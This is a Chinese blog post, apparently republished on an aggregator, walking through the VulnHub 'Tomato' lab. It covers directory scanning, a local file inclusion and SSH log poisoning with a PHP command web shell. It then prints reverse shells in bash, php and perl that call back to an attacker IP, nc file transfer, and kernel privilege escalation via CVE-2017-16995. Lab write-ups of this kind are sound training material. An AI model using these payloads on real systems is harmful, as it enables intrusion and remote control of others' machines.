码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • vulnhub之tomato(西红柿)


    目录

    一、主机发现

    二、端口扫描

    三、服务版本发现

    四、信息收集

    五、扩大供给面扫描目录

    1.dirsearch常规字典

    2.gobuster

    六、/antibot_image信息收集

    七、文件包含

    八、反弹shell

    九、内核漏洞枚举提权

     1.工具linux-exploit-suggester

    2.传输工具

    3.挨个尝试

    十、CVE-2017-16995


    一、主机发现

    二、端口扫描

    三、服务版本发现

    开放了两个http服务端口,使用的中间件不一样。

    21端口部署ftp

    2211端口部署ssh服务

    还知道这是unbuntu系统。

    四、信息收集

    1.80

    果然是个大西红柿,再例行检查下源码,业务有用信息

    2.8888

     登录框,最经典尝试,弱口令。无法成功

    五、扩大供给面扫描目录

    1.dirsearch常规字典

    啥都没有,换大字典的话dirsearch跑的很慢,所以换gobuster

    2.gobuster

    是基于go语言开发的,速度快

    gobuster dir -u  http://192.168.0.101 -w /usr/share/seclists/Discovery/Web-Content/common.txt

    301状态码引起我们的注意

    六、/antibot_image信息收集

    1.从图片判断这服务器部署里反爬虫应用

    2.info.php文件

    这就是一个phpinfo文件,里面有开关配置信息,服务器环境,配置文件目录等

    3.info.php文件源码

    注释中出现了信息泄露,很明显是一个include文件包含的函数

    七、文件包含

     1.参数中对本地文件进行包含

    2.对远程文件包含

    实操:在kali上创建一个php文件,来远程包含,失败

    条件:简单来说远程文件包含,就是可以包含其他主机上的文件,并当成php代码执行。
    要实现远程文件包含的话,php配置的allow_url_include = on必须为on(开启)

    这点从phpinfo中也可以看出来。他没开

    3.通过文件包含漏洞查看私钥

    失败,他没有/home/tomato/.ssh/id_rsa

    4.查看ubuntu日志文件

    /var/log/auth.log

    这个日志是unbuntu默认的登陆失败的记录日志。所以我们可以利用ssh或者ftp登录失败注入代码。

    5.测试

    ssh aaaaaaaaaaaa@192.168.0.101 -p 2211

    果然我们输入的aaaaaaaaaaaa都出现在了上面,把他更改为木马

     

    6.写入命令执行木马到日志

    <?php echo system($_GET['cc'])?>

    将这个写入的时候,php代码没有显示,证明服务器存在php运行环境,注入脚本正常解析了

    7.参数测试

    view-source:http://192.168.0.101/antibot_image/antibots/info.php?image=/var/log/auth.log&cc=id

    八、反弹shell

    最后利用python反弹成功

     1.bash

    bash -i >& /dev/tcp/192.168.0.104/4444 0>&1

    2.php

    php -r '$sock=fsockopen("控制端ip",控制端端口);exec("/bin/bash -i <&3 >&3 2>&3");'

    3.perl

    perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:7777");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

    九、内核漏洞枚举提权

     1.工具linux-exploit-suggester

    sudo apt install linux-exploit-suggester

    2.传输工具

    服务端:

    nc -nvlp 4444 > 1.sh

    客户端:

    nc 192.168.0.101 4444 < linux-exploit-suggester.sh -w 1

    3.挨个尝试

    十、CVE-2017-16995

    在kali端用gcc编译后,nc上传,给予权限,最后执行。

     

     

  • 相关阅读:
    嵌入式必备技能---git与github
    [附源码]计算机毕业设计在线影院系统Springboot程序
    未来城市:数字孪生技术助力智慧城市构建
    Vue中事件修饰符与键盘事件
    C语言实现控制台简易计算器(VC6.0可用)
    微信小程序 24 播放音乐页的完善①
    山东2022中国农民丰收节 国稻种芯:主场活动在禹城举办
    django数据库mysql迁移问题
    【尚庭公寓SpringBoot + Vue 项目实战】移动端项目初始化(十九)
    注解详解系列 - @EnableAspectJAutoProxy:启用AspectJ自动代理
  • 原文地址:https://blog.csdn.net/weixin_54431413/article/details/125538373
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号